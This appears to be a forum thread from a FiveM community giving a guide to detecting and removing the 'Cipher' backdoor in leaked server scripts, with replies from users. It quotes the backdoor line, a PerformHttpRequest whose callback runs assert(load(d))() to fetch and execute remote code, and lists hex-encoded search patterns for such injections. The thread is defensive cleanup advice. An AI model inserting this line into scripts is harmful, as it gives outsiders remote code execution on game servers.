Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
Backdoors Found: 0
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard
justscripts

Guide How to Clean a FiveM Cipher Backdoor?

cfxregame

cfxregame

Gold Elite
Joined
Nov 3, 2021
Messages
319
Reaction score
166,548
Points
361
Location
Newyork
Website
cfx.re
How Can I Tell If I Have a Backdoor?
If you find a code like the following at the bottom of client.lua, config.lua, or server.lua in any script in your package, and it reappears even after you delete it, the script you're using has a cipher/backdoor.
1724287818892.png




How Do I Clean This Backdoor?
Search for the code function (e, d) pcall(function() assert(load(d))() end) end) inside your package. When you search, you may find a code similar to PerformHttpRequest('
Hidden link for visitors, to see Log in or register now.
', function (e, d) pcall(function() assert(load(d))() end) end) (the domain inside will vary, I randomly chose it). If you find this code, you’re lucky; the person who added the backdoor hasn't encrypted the script. If you delete the found code line and the local (randomletters) code above it, the backdoor will be removed.

What If I Can't Find the Code or Local Variables Keep Reappearing After Deletion?
If you encounter this situation, it means the code is part of an encrypted script. To find which script it's in, use Raider's es-antibackdoor script. When installed, it will list all potentially malicious parameters in the CMD. You need to read through them and search for the code line I provided. Once you find it, delete the script and the local (randomletters) code. Your package will be clean!

Hidden link for visitors, to see Log in or register now.
 
chillgamer

chillgamer

Member
Joined
Jun 6, 2024
Messages
7
Reaction score
0
Points
146
Location
United States
Anyone have success using these tools? One of them was successful at finding a couple infected scripts that I had but when I relaunched the server, thinking it was clean, I still experienced the Cipher troll that is seen in their advertisement videos.

I really need help here... My city is loyal, but we are new (only a month old) and I know if we go through another one of these experiences, we will lose a lot of folks... we have been down for about 5 days now and we are blessed that people are willing to stick around even after that many days... but I really dont want to risk losing anyone else. Me and my team worked too hard for it all to go down the drain like this...

If anyone has any advice, or has successfully removed this infection from their server, please reach out to me. I would be willing to pay for your time, and just need to make sure I am not missing anything as I try to scrub my server a 2nd time. I do not plan on using leaks after this, just really need to get back up and running.

Thanks! ❤️
 
Valdifer

Valdifer

Bronze Elite
Joined
Aug 22, 2024
Messages
11
Reaction score
3
Points
166
Location
Spain
chillgamer said:
Anyone have success using these tools? One of them was successful at finding a couple infected scripts that I had but when I relaunched the server, thinking it was clean, I still experienced the Cipher troll that is seen in their advertisement videos.

I really need help here... My city is loyal, but we are new (only a month old) and I know if we go through another one of these experiences, we will lose a lot of folks... we have been down for about 5 days now and we are blessed that people are willing to stick around even after that many days... but I really dont want to risk losing anyone else. Me and my team worked too hard for it all to go down the drain like this...

If anyone has any advice, or has successfully removed this infection from their server, please reach out to me. I would be willing to pay for your time, and just need to make sure I am not missing anything as I try to scrub my server a 2nd time. I do not plan on using leaks after this, just really need to get back up and running.

Thanks! ❤️
Click to expand...

Just if u want to clean like OP said, if you have encrypted code i should recommend stop using encrypted addons due to u can't see what are they doing.

In second instance i would use notepad++ to search the next text lines to avoid an injection and delete it:

\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74 <-- PerformHttpRequest
\x61\x73\x73\x65\x72\x74 <-- assert
\x6c\x6f\x61\x64 <-- load
\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74 <-- RegisterNetEvent
\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72 <-- AddEventHandler

You can search for all documents \x61 = a or PerformHttpRequest or assert in all your resources directory and your fxserver directory too, and if you see something strange, you should delete it.

I have seen a guy doing a BaseEncode64 inside a ydr file and in the fxmanifest using files with client.lua decoding and having a backdoor too, so i suggest anyway apart from this check your fxmanifest and see what does those files, and do it always when u are going to use a new resource, i found a lot of backdoors in a lot of scripts leaks, so i do always in the same way and for today 0 backdoors and i have a lot of leak scripts
 
Jimsta8

Jimsta8

Member
Joined
Sep 17, 2025
Messages
13
Reaction score
0
Points
96
Location
South Africa
cfxregame said:
How Can I Tell If I Have a Backdoor?
If you find a code like the following at the bottom of client.lua, config.lua, or server.lua in any script in your package, and it reappears even after you delete it, the script you're using has a cipher/backdoor.
View attachment 30174



How Do I Clean This Backdoor?
Search for the code function (e, d) pcall(function() assert(load(d))() end) end) inside your package. When you search, you may find a code similar to PerformHttpRequest('
Hidden link for visitors, to see Log in or register now.
', function (e, d) pcall(function() assert(load(d))() end) end) (the domain inside will vary, I randomly chose it). If you find this code, you’re lucky; the person who added the backdoor hasn't encrypted the script. If you delete the found code line and the local (randomletters) code above it, the backdoor will be removed.

What If I Can't Find the Code or Local Variables Keep Reappearing After Deletion?
If you encounter this situation, it means the code is part of an encrypted script. To find which script it's in, use Raider's es-antibackdoor script. When installed, it will list all potentially malicious parameters in the CMD. You need to read through them and search for the code line I provided. Once you find it, delete the script and the local (randomletters) code. Your package will be clean!

Hidden link for visitors, to see Log in or register now.
Click to expand...
update the link pls
 
You must log in or register to reply here.
Top